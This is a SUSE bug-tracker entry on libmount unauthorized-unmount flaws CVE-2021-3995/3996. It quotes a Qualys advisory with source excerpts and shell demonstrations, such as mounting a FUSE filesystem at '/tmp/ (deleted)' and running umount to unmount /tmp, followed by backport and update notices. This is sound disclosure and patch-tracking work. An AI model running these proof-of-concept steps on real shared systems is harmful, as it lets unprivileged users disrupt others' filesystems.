Bug 1194976 - (CVE-2021-3995) VUL-0: CVE-2021-3995, CVE-2021-3996: util-linux: libmount unauthorized unmounts
(CVE-2021-3995)
VUL-0: CVE-2021-3995, CVE-2021-3996: util-linux: libmount unauthorized unmounts
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Stanislav Brabec
Security Team bot
https://smash.suse.de/issue/321258/
CVSSv3.1:SUSE:CVE-2021-3995:4.7:(AV:L...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2022-01-20 16:53 UTC by Alexander Bergmann
Modified: 2022-05-16 17:38 UTC (History)
3 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Comment 6 Marcus Meissner 2022-01-24 14:06:26 UTC
is public

From: Qualys Security Advisory <qsa@qualys.com>
Subject: [oss-security] CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount

Hi all,

We discovered two vulnerabilities (unauthorized unmounts) in
util-linux's libmount, CVE-2021-3996 and CVE-2021-3995. Patches are now
available at (many thanks to Karel Zak, Red Hat Product Security, and
the members of linux-distros@openwall):

https://github.com/util-linux/util-linux/commit/166e87368ae88bf31112a30e078cceae637f4cdb
https://github.com/util-linux/util-linux/commit/57202f5713afa2af20ffbb6ab5331481d0396f8d
https://github.com/util-linux/util-linux/commit/9c05f4b6bf62a20a64a8e5735c7f3dcf0229e895

https://github.com/util-linux/util-linux/commits/stable/v2.37
https://mirrors.edge.kernel.org/pub/linux/utils/util-linux/v2.37/

Below is a short write-up (which is part of a longer advisory that is
mostly unrelated to util-linux and that we will publish at a later
date):


========================================================================
CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount
========================================================================

[...]

Consequently, we audited the SUID-root programs umount and fusermount
for ways to unmount a filesystem that does not belong to us, and we
discovered CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount
(which is used internally by umount).

Note: CVE-2021-3996 and CVE-2021-3995 were both introduced by commit
5fea669 ("libmount: Support unmount FUSE mounts") in November 2018.


========================================================================
CVE-2021-3996: Unauthorized unmount in util-linux's libmount
========================================================================

In order for an unprivileged user to unmount a FUSE filesystem with
umount, this filesystem must a/ be listed in /proc/self/mountinfo, and
b/ be a FUSE filesystem (lines 466-470), and c/ belong to the current,
unprivileged user (lines 477-498):

------------------------------------------------------------------------
 451 static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
 452 {
 ...
 466         if (strcmp(type, "fuse") != 0 &&
 467             strcmp(type, "fuseblk") != 0 &&
 468             strncmp(type, "fuse.", 5) != 0 &&
 469             strncmp(type, "fuseblk.", 8) != 0)
 470                 return 0;
 ...
 477         if (mnt_optstr_get_option(optstr, "user_id", &user_id, &sz) != 0)
 478                 return 0;
 ...
 490         uid = getuid();
 ...
 497         snprintf(uidstr, sizeof(uidstr), "%lu", (unsigned long) uid);
 498         return strncmp(user_id, uidstr, sz) == 0;
 499 }
------------------------------------------------------------------------

Unfortunately, when parsing /proc/self/mountinfo, the libmount blindly
removes any " (deleted)" suffix from the mountpoint pathnames (at lines
231-233):

------------------------------------------------------------------------
 17 #define PATH_DELETED_SUFFIX     " (deleted)"
------------------------------------------------------------------------
 179 static int mnt_parse_mountinfo_line(struct libmnt_fs *fs, const char *s)
 180 {
 ...
 223         /* (5) target */
 224         fs->target = unmangle(s, &s);
 ...
 231         p = (char *) endswith(fs->target, PATH_DELETED_SUFFIX);
 232         if (p && *p)
 233                 *p = '\0';
------------------------------------------------------------------------

This vulnerability allows an unprivileged user to unmount other users'
filesystems that are either world-writable themselves (like /tmp) or
mounted in a world-writable directory.

For example, on Fedora, /tmp is a tmpfs, so we can mount a basic FUSE
filesystem named "/tmp/ (deleted)" (with FUSE's "hello world" program,
./hello) and unmount /tmp itself (a denial of service):

------------------------------------------------------------------------
$ id
uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

$ grep /tmp /proc/self/mountinfo
84 87 0:34 / /tmp rw,nosuid,nodev shared:38 - tmpfs tmpfs rw,seclabel,size=2004304k,nr_inodes=409600,inode64

$ mkdir -m 0700 /tmp/" (deleted)"
$ ./hello /tmp/" (deleted)"

$ grep /tmp /proc/self/mountinfo
84 87 0:34 / /tmp rw,nosuid,nodev shared:38 - tmpfs tmpfs rw,seclabel,size=2004304k,nr_inodes=409600,inode64
620 84 0:46 / /tmp/\040(deleted) rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1000,group_id=1000

$ mount | grep /tmp
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,seclabel,size=2004304k,nr_inodes=409600,inode64)
/home/john/hello on /tmp/ type fuse.hello (rw,nosuid,nodev,relatime,user_id=1000,group_id=1000)

$ umount -l /tmp/
$ grep /tmp /proc/self/mountinfo | wc
      0       0       0
------------------------------------------------------------------------


========================================================================
CVE-2021-3995: Unauthorized unmount in util-linux's libmount
========================================================================

Alert readers may have spotted another vulnerability in
is_fuse_usermount(): at line 498, only the first "sz" characters of the
current user's uid are compared to the filesystem's "user_id" option (sz
is user_id's length). This second vulnerability allows an unprivileged
user to unmount the FUSE filesystems that belong to certain other users;
for example, if our own uid is 1000, then we can unmount the FUSE
filesystems of the users whose uid is 100, 10, or 1:

------------------------------------------------------------------------
$ id
uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

$ grep fuse /proc/self/mountinfo
38 23 0:32 / /sys/fs/fuse/connections rw,nosuid,nodev,noexec,relatime shared:18 - fusectl fusectl rw
620 87 0:46 / /mnt/bin rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1,group_id=1

$ umount -l /mnt/bin
$ grep fuse /proc/self/mountinfo
38 23 0:32 / /sys/fs/fuse/connections rw,nosuid,nodev,noexec,relatime shared:18 - fusectl fusectl rw
------------------------------------------------------------------------


Thank you very much! We are at your disposal for questions, comments,
and further discussions.

With best regards,

-- 
the Qualys Security Advisory team
Comment 7 Stanislav Brabec 2022-01-24 21:09:58 UTC
I am taking f3db9bd609494099f0c1b95231c5dfe383346929 and 018a10907fa9885093f6d87401556932c2d8bd2b from the maintenance branch. These two patches cover all three lower mentioned patches.
Comment 8 Stanislav Brabec 2022-01-24 21:28:21 UTC
Hopefully, only util-linux >= 2.34 is affected, i. e. SLE15 SP3 and SP4.

git describe --contains 5fea669
v2.34-rc1~248

The feature was not backported to 2.33.x.
Comment 9 Stanislav Brabec 2022-01-24 21:49:32 UTC
SLE15 SP3 Update: https://build.suse.de/request/show/263018
SLE15 SP4: https://build.suse.de/request/show/263019

Factory will get 2.37.3 soon.
Comment 11 Swamp Workflow Management 2022-03-04 14:36:07 UTC
openSUSE-SU-2022:0727-1: An update that solves two vulnerabilities, contains two features and has two fixes is now available.

Category: security (moderate)
Bug References: 1188507,1192954,1193632,1194976
CVE References: CVE-2021-3995,CVE-2021-3996
JIRA References: SLE-23384,SLE-23402
Sources used:
openSUSE Leap 15.3 (src):    libeconf-0.4.4+git20220104.962774f-150300.3.6.2, python3-libmount-2.36.2-150300.4.14.2, shadow-4.8.1-150300.4.3.8, util-linux-2.36.2-150300.4.14.3, util-linux-systemd-2.36.2-150300.4.14.2
Comment 12 Swamp Workflow Management 2022-03-04 14:44:37 UTC
SUSE-SU-2022:0727-1: An update that solves two vulnerabilities, contains two features and has two fixes is now available.

Category: security (moderate)
Bug References: 1188507,1192954,1193632,1194976
CVE References: CVE-2021-3995,CVE-2021-3996
JIRA References: SLE-23384,SLE-23402
Sources used:
SUSE Linux Enterprise Module for Transactional Server 15-SP3 (src):    libeconf-0.4.4+git20220104.962774f-150300.3.6.2
SUSE Linux Enterprise Module for Server Applications 15-SP3 (src):    util-linux-systemd-2.36.2-150300.4.14.2
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    libeconf-0.4.4+git20220104.962774f-150300.3.6.2, shadow-4.8.1-150300.4.3.8, util-linux-2.36.2-150300.4.14.3, util-linux-systemd-2.36.2-150300.4.14.2
SUSE Linux Enterprise Micro 5.1 (src):    libeconf-0.4.4+git20220104.962774f-150300.3.6.2, shadow-4.8.1-150300.4.3.8, util-linux-2.36.2-150300.4.14.3, util-linux-systemd-2.36.2-150300.4.14.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 13 Swamp Workflow Management 2022-04-19 22:31:03 UTC
SUSE-SU-2022:0727-2: An update that solves two vulnerabilities, contains two features and has two fixes is now available.

Category: security (moderate)
Bug References: 1188507,1192954,1193632,1194976
CVE References: CVE-2021-3995,CVE-2021-3996
JIRA References: SLE-23384,SLE-23402
Sources used:
SUSE Linux Enterprise Micro 5.2 (src):    libeconf-0.4.4+git20220104.962774f-150300.3.6.2, shadow-4.8.1-150300.4.3.8, util-linux-2.36.2-150300.4.14.3, util-linux-systemd-2.36.2-150300.4.14.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 14 Stanislav Brabec 2022-05-16 17:38:11 UTC
Fixes are released and Factory contains fixed util-linux-2.37.4. I guess we can close this bug.